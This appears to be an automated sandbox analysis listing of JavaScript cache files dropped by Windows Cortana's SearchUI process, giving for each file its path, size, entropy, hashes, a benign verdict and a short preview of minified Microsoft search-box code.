                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):57418
                                                            Entropy (8bit):5.115734627931113
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B8C9A25AC5C5CFFDBC7721E7A33573CF
                                                            SHA1:D830E8814D866781CE338B8218B87B1066AF3E06
                                                            SHA-256:AB0B50651ABD4CF85042498827D99C42508A4E73F742F5EF52D571A15B3658B6
                                                            SHA-512:21F4B9AF5DB0329E2063C8BFA60DF4B15237E760C9A56FFA8D3556AA021BB463AE5561B0E61CDC412907D4BDE301E4BDCA93ED397CED339941649B6A493C165F
                                                            Malicious:false
                                                            Preview: var __assign,__extends,__spreadArrays,WSB;(function(n){var t;(function(n){function t(){for(var t,r,u,n,f,e=[],i=0;i<arguments.length;i++)e[i]=arguments[i];for(t=[],r=0,u=e;r<u.length;r++)if(n=u[r],n)if(typeof n=="string")t.push(n);else for(f in n)n[f]&&t.push(f);return t.length>0?t.join(" "):null}function i(n){return ThresholdUtilities.getUrlParameter(location.search,"isTest")?n:undefined}n.ViewData={};n.classNames=t;n.whenTestHooks=i})(t=n.View||(n.View={}))})(WSB||(WSB={}));__extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),function(n){var t;(function(n){var t=function(n){function t(){return n!==null&&n.apply(this,arguments)||this}return __extends(t,n),t.prototype.componentDidMo
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\22vbw3mGZSKEYr35n4QdID4G9j8[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\41Ctwd2X9VNGNHVpdti2vTFozWw.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):3280
                                                            Entropy (8bit):5.029628776196898
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:65237D68849782412963C9B1A1DA22E5
                                                            SHA1:3490F341E17FEAA7FB56D942539C24C5FA54A30A
                                                            SHA-256:4B950875FDE265B75753C2A8BEC4588476A323036B38B360A3EDD2A22A106B49
                                                            SHA-512:FB18BFB43AF2BC6BFFE020AF039D7BCD74B7CE1823D62026F6B5F231E51E024240E2F8B6399716DDFED2EDDECA6302B43D982256ADE02026AA0A6052C35085DF
                                                            Malicious:false
                                                            Preview: var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),WSB;(function(n){var t;(function(n){var t=function(t){function i(){return t!==null&&t.apply(this,arguments)||this}return __extends(i,t),i.prototype.render=function(){if(!this.props.dataModel)return null;var t=this.props.dataModel,r=t.message,i=t.cancel,u=t.showSpinner;return React.createElement("div",{className:"snipSearchMessage"},u&&React.createElement(n.AnimatedLoader,null),React.createElement("div",{className:"primaryText loaderMessage"},r),i&&React.createElement("button",{className:"loaderButton",onClick:i},n.getLocString("Cancel")))},i}(React.Component);n.SnipSearchMessage=t})(t=n.View||(n.View={}))})(WSB||(WSB={}));__ex
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\E1FvzbKmaRHmOqEzJ-mHoTOD7Ms.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\TJkyBfZhNVw9l2HAW3TbsZKbNwc.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\Yi3Flkft8YS8nbd9qCHjIlXAHPg.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):45447
                                                            Entropy (8bit):4.519302585237155
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:6859B06C69A93BD325D6CDB2A5CECBD4
                                                            SHA1:5F1B96C6E59054C14D1EE9A3F3A2CBBC70E03B87
                                                            SHA-256:6A232348034A0564B74D8A293AC8DC15664E26664CD4E071E1D2E740B76D9EC6
                                                            SHA-512:9166D92CBF6945282259A2CA8D53F6D5986FF81DE3D61C191D44A745B093936E21E71132833CB885A829C9BF9E4CE42618BD5E995B7A24929436615DF35E91ED
                                                            Malicious:false
                                                            Preview: var WSB;(function(n){var t;(function(n){var t;(function(n){function t(n,t){return n[t]?n[t]:0}function i(n){return t(n,25)>.5?t(n,282)>.39824?.69957:t(n,11)>.5?-.10865:t(n,0)>.11348?-.43924:-.84281:t(n,10)>1.5?t(n,282)>.74998?.96874:t(n,264)>.2555?t(n,10)>2.5?t(n,103)>.75004?t(n,158)>4595?.45522:.86367:t(n,16)>4800.5?t(n,0)>.37977?.70215:.19872:t(n,8)>.5?t(n,38)>390296.5?.40772:.75656:.18243:t(n,2)>1.5?.4651:-.16901:t(n,41)>.1765?.90432:.44919:t(n,282)>.70002?.68892:t(n,2)>2.5?t(n,16)>3320.5?-.30696:.07806:-.53174}function r(n){return t(n,25)>.5?t(n,282)>.49998?.59407:t(n,17)>.77996?-.15554:-.67158:t(n,10)>1.5?t(n,282)>.66667?.80523:t(n,10)>3.5?t(n,41)>.5175?.77296:t(n,8)>.5?t(n,158)>6310.5?.272:t(n,38)>29401304?.07058:.63578:.16914:t(n,94)>.57635?t(n,39)>.0305?.32237:.68096:t(n,2)>2.5?t(n,38)>3203480.5?.02127:.50932:t(n,16)>5365.5?t(n,296)>.8325?-.37343:.20213:.1316:t(n,282)>.77894?.58741:t(n,16)>3833?-.41734:t(n,103)>.63135?.09324:-.23768}function u(n){return t(n,25)>.5?t(n,282)>.307
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\jhP1uapRf8Z8Qb959t11DNTsvB8.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\jz5JHWe_2WCod7u1RNWmByRezL4.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):8204
                                                            Entropy (8bit):5.24502306901906
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E9E0F2C7D9FF4E7BA872A004593454B5
                                                            SHA1:2DB69A5F85D5AFD2C523F8F6B8867EAA4E1125F9
                                                            SHA-256:24D847FBF4FD59BE3529FDFA7542FD3FE9512662927DD482E60D11344175E778
                                                            SHA-512:F01AC1FED499AAB6465F3F1FEA96B5036043C260DD8A9029046895768794503264A98E41CC306F54557EAC74C228AF9A65A1E6CBDCFE6B4E0E8BBBD730F6A6A5
                                                            Malicious:false
                                                            Preview: var FailedPromise=function(){function n(){this.isActive=!0;this.operation=null}return n.prototype.then=function(n,t){return this.handleError(t),this},n.prototype.done=function(n,t){this.handleError(t)},n.prototype.handleError=function(n){this.isActive&&n&&_w.setImmediate(function(){return n(null)})},n.prototype.cancel=function(){this.isActive=!1},n}(),ThresholdUtilitiesM2=function(){function n(){this.regExes={};this.guidCleaner=/[-{}]/g;this.isFirstPageStart=!0;this.startTime=_w.performance?_w.performance.timing.navigationStart:si_ST;this.apiSequenceNumber=0;this.headersAsyncPromise=null;this.headersCallComplete=!1;this.cortanaHeaders=null;this.themeColor=null;this.isDarkTheme=null;this.headersCallTimeout=3e3;this.headersCallbacks=[];this.rtlLangs=["ar","dv","fa","he","ku-arab","pa-arab","prs","ps","sd-arab","syr","ug","ur","qps-plocm"];sj_evt.bind("ajax.threshold.authChanged",sj_dm(this,this.clearLocalCache),1);sj_evt.bind("ajax.threshold.pageStart",sj_dm(this,this.onPageStart),1)}ret
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\p_H40Ndq102p2Socno0_V88cqhw[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):8313
                                                            Entropy (8bit):6.052018977754187
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:ABF5B9B940857FBD14B60DEA87CCB55F
                                                            SHA1:8A8AA1FF59E26E1C9E5137269630CA25DA231F3E
                                                            SHA-256:402598AD8D9469816D4AA4E7DF4957B8A01AC03BF09A9AFED279E45777B046C8
                                                            SHA-512:F3B556775EF65D0836E3B593867DA0194F0D2E67F78CFEFF99218851466A7F7E6364369194735FFDC22021175A8959B05F71F959D968897812DDB1EAB5FACE0A
                                                            Malicious:false
                                                            Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"MicrosoftSearch",namespace:"WindowsSearchBox"},{MsbPeopleContacts:t[0],MsbPeopleGroups:t[1],MsbReverifyAccount:t[2],MsbVerifyAccount:t[3]}),i}return i(n,t)})("ar",[".... .......",".........",".... .. ..... ..... .. ....... ..... .. {0}",".... .. ..... ..... .. ....... ....."])("bg",["........",".....",".......... ....... .., .. .. ....... .......... .. ........ .. .. {0}",".......... ....... .. .. ....... . ......... .........."])("ca",["Contactes","Grups","Verifiqueu el compte per cercar informaci. de la feina des de {0}","Verifiqueu el compte per cercar informaci. de la feina"])("cs",["Kontakty","Skupiny","Chcete-li vyhledat pracovn. informace z adresy {0}, ov..te sv.j ..et","Chcete-li vyhledat pracov
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\sWWssH4VwKKxySDezvIayxUduKc[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1799310
                                                            Entropy (8bit):6.276777165076816
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:64C2295BAA2FA6AC19AA8E78FCD509EF
                                                            SHA1:9A1A6E37CB455504CF8120E20541C9680AF9097B
                                                            SHA-256:03DDA809E459F05D75A3838522A2BF4D189337E0C9103B98EC66168FE7933C74
                                                            SHA-512:B946B280F0A9C0582F0C80D69A3AFAE82E175DD87AEF29A2AEC5EEF1DA59913F745B439E7CC72CAAA449E541D67E24C48C0968C70FF6A3E8B065926804E6EF9E
                                                            Malicious:false
                                                            Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"WsbLocStrings",namespace:"WindowsSearchBox"},{AadAccount:t[0],AcceptButtonOK:t[1],Accounts:t[2],AcknowledgeFlyoutText:t[3],ActionsSection:t[4],AddAadAccount:t[5],AddingScopeNarratorText:t[6],AddingScopeNarratorTextAll2:t[7],AddMicrosoftAccount:t[8],Album:t[9],AnaheimData:t[10],App:t[11],Artist:t[12],Author:t[13],AvailableAccounts:t[14],BestMatch:t[15],BestMatchFor:t[16],BingImageAPIError:t[17],BingImageLeftCarousel:t[18],BingImageOfDay:t[19],BingImageRightCarousel:t[20],Build:t[21],Cancel:t[22],Celsius:t[23],Clear:t[24],CloudSearch:t[25],CommandGroup:t[26],Company:t[27],ConnectedAccount:t[28],ConnectedAccounts:t[29],ContactGroup:t[30],Content:t[31],ContextMenu:t[32],ControlPanelAnnotation:t[33],CopyDetails:t[34],CopyFullPath:t[35],CortanaAnnotation_Email:t[36],CortanaGroup:t[37],CustomizeSearchHome:t[38],DesktopAppAnnotation:t[39],DirectNavSuggestion:t[40],DismissBingImage:t[41],DismissFlyout:t[42],Dismi
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\zh8Gb8BdCdZddFgn7wQ6G86Jdok.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):37342
                                                            Entropy (8bit):5.3267899861839485
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:F44EA9D80C88FBCDA801F3A2E0D79E8D
                                                            SHA1:942DAC5E088686F2D09D048AA5F376DE366421E1
                                                            SHA-256:57DEBE6CDD1AEBDE19A85A2B95AA78FD8DCA4726F12BBB0D59931E5F21F92C85
                                                            SHA-512:2AB3D3F4551DD32F0AA7BF50660FBC28FD690C95108AA460C4C465DEF883A7D76DE1E286D3132029BECA767AE615A0DF788F91D7367CD9D0C9DA32754CB3364D
                                                            Malicious:false
                                                            Preview: var Microsoft,__extends,WindowsFeedback,Feedback;(function(n){var t;(function(t){"use strict";function e(t){for(var f=null,r,i,u=0;u<t.length;u++){r=t[u];try{i=r.provide()}catch(e){n.le("Query provider "+r.name+" failed",e)}if(typeof i=="string"&&i.length>0){f=i;break}}return f}function p(t){var r=t.querySelectorAll('input[type="radio"][required][name]'),i=!0;return n.Core.ForEach(r,function(n){var r=n.getAttribute("name"),u='input[type="radio"][required][name="'+r+'"]:checked',f=t.querySelector(u)!==null;i=i&&f}),i}function l(t,i){var r,u;return t===window?t.document.documentElement["client"+i]:t.nodeType===9?(r=t.documentElement,u=t.body,Math.max(u["scroll"+i],u["offset"+i],r["scroll"+i],r["offset"+i],r["client"+i])):parseFloat(n.Core.GetComputedStyle(t)[i.toLowerCase()])}function a(n,t,i){var u={},f;for(var r in t)u[r]=n.style[r],n.style[r]=t[r];f=i(n);for(r in t)n.style[r]=u[r];return f}function w(){y(!1)}function v(n){y(!0,n)}function y(t,i){n.Core.ForEach(_d.querySelectorAll('inp
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\zh8Gb8BdCdZddFgn7wQ6G86Jdok.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\-cZsBti431DEnyexEqRgH_6Vh3E.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\41Ctwd2X9VNGNHVpdti2vTFozWw.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\4yU6o9nzuSe0YbPN7SClkKqmF_A.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:exported SGML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):206389
                                                            Entropy (8bit):5.317441455647523
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A07762DF96F4D7C691102B03AA3A2B4F
                                                            SHA1:D1DAF359D01FD78A447BE8A5F2B2A2DD72CFD3B4
                                                            SHA-256:F622EEBC2B8049B8D3DD3DDAB085588091CFA1DC07DD56E63B220D99490E12C3
                                                            SHA-512:44B9BA5838200E49160D889528A43829EEC4DF26DAD51B5C470D217C0A0E0738F083C08B114D112A4F75A8087C1D72F9289476580580AD7E02EC4A2547076479
                                                            Malicious:false
                                                            Preview: var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),__spreadArrays,WSB;(function(n){function f(t,r,u,f,e,o,s,h){i(t,r,u,function(t){var i=null;t.status==200&&(i=t.responseText?n.safeExecute(function(){return JSON.parse(t.responseText)},"JSON.parse"):{success:!0});f(i)},e,o,s,h)}function i(i,r,u,f,e,o,s,h,c){var l=c&&_w.XMLHttpRequest?new XMLHttpRequest:sj_gx(),v,a;try{l.open(u?"POST":"GET",i,!0)}catch(y){SharedLogHelper.LogError("fetchUrl",i,y);f&&f({responseText:"",contentType:"",status:-1,result:3});return}if(r)for(v in r)l.setRequestHeader(v,r[v]);e&&(a=e.register(function(){return l.abort()},!1,"xhr abort"));n.config.useEventListeners?(l.addEventListener("load",function(){t
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\98-tFzBbrLP3oaKdmZtyZ4BBBI4.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines
                                                            Category:dropped
                                                            Size (bytes):121609
                                                            Entropy (8bit):5.370285863147917
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:129776DB6BA6BEA4AF70CDB1EA56942A
                                                            SHA1:12BFE666C0B57B134E7B8B88BCF1A0C3B5DCF3CD
                                                            SHA-256:2D55886903198E35295B8E90738DA47859837BABA26D47E15BAC87F90EE608D3
                                                            SHA-512:AEDF99A152B97BE6A57F0D1FB1DD43B0BB69508EAE65B3A054024CD9E5DD59670EBEAFF6CE7525E2B7263BBD7C963C30659628F9A2DF16410674871538DEF94B
                                                            Malicious:false
                                                            Preview: /*! Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. */.var WinJS_Init=function(n,t){var i=typeof n!="undefined"?n:typeof t!="undefined"?t:typeof global!="undefined"?global:{};(function(n){typeof define=="function"&&define.amd?define([],n):(i.msWriteProfilerMark&&msWriteProfilerMark("WinJS.4.4 4.4.0.winjs.2016.5.19 base.js,StartTM"),typeof exports=="object"&&typeof exports.nodeName!="string"?n():n(i.WinJS),i.msWriteProfilerMark&&msWriteProfilerMark("WinJS.4.4 4.4.0.winjs.2016.5.19 base.js,StopTM"))})(function(){var u,r;return function(){"use strict";function t(n,t){n=n||"";var i=n.split("/");return i.pop(),t.map(function(n){if(n[0]==="."){var r=n.split("/"),t=i.slice(0);return r.forEach(function(n){n===".."?t.pop():n!=="."&&t.push(n)}),t.join("/")}return n})}function f(r,f,e){return r.map(function(r){if(r==="exports")return e;if(r==="require")return function(n,i){u(t(f,n),i)};var o=n[r];if(!o)throw new Error("Undefined dependency: "+r);return o
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\T60N45BmFmN366tGF_ypDnu_BSI.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):61910
                                                            Entropy (8bit):5.212669983150976
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:511133657AF5879385B2A2F549D8728A
                                                            SHA1:9FB769E39DDC9A2F24CD80B4ECE18BFF2E1C89EE
                                                            SHA-256:CDFEAEB6D130502BCD1C97485FD247E8377F47E308E15C829BDB6B43EAC370D6
                                                            SHA-512:F487AA6610D4EA74A2DB08DDC5628D650BCFE55C1021EFF930F9FFF9E4EDE2B4B84C8528ED23A34B8371860335E916FACDAB3894A134764125299EA9D2FCC31D
                                                            Malicious:false
                                                            Preview: var WSB;(function(n){function di(n,i){var r=[],u,f;if(i)if(n)r=i.slice();else{u=function(n){var t=i.find(function(t){return t.verb&&t.verb.toLocaleLowerCase()==n.toLocaleLowerCase()});t&&r.push(t)};for(f in t)u(f)}return r}function gi(n){return n?n.filter(function(n){return!n.verb||n.verb.toLowerCase()!="open"}):[]}function f(t,i,r,u,f,e){e()&&(t=t.slice(),i.getExtraVerbsAsync?n.Promise.safeChain("getExtraVerbsAsync",function(){return i.getExtraVerbsAsync(u)},function(n){return h(k(t,n,!0),i,u,f,e)},function(){return h(t,i,u,f,e)},null,r):h(t,i,u,f,e))}function h(n,t,i,r,u){if(u()){var f=t.getExtraVerbs?k(n,t.getExtraVerbs(i),!1):n;f[0]==v&&f.shift();r(f)}}function nr(i,r,u,f){return i.map(function(i){var e,o,s,h;if(i.verb){switch(i.verb.toLocaleLowerCase()){case at:e="PinnedToStart";break;case w:e="PinnedToTaskbar";break;case vt:e="UnpinnedFromStart";break;case b:e="UnpinnedFromTaskbar";break;case lt:o="UninstallConfirmation";e="UninstallationInProgress"}return s=function(t){t();n.Run
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\T60N45BmFmN366tGF_ypDnu_BSI.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\XlOxpNAPazK1Ul3yuHNFQLgvMig.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):68729
                                                            Entropy (8bit):5.410874231094568
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:FDB38BCD50516FE5B941C0A129871C7A
                                                            SHA1:C3EAE8B7DDCA1D1CAE603736B62C8DDC30682220
                                                            SHA-256:3F3896F727136A67F7B5A668FC950CC74DD266B48AD6DB80B43C5A0F88EAD898
                                                            SHA-512:1B16CB45494B7D946180B88FB767DF9C97D1FF93D845CF8A5E36468844D60878275FA3EFA12D73335810D77514AAF73119C5F5DB1B154E845ACB8979AA61E761
                                                            Malicious:false
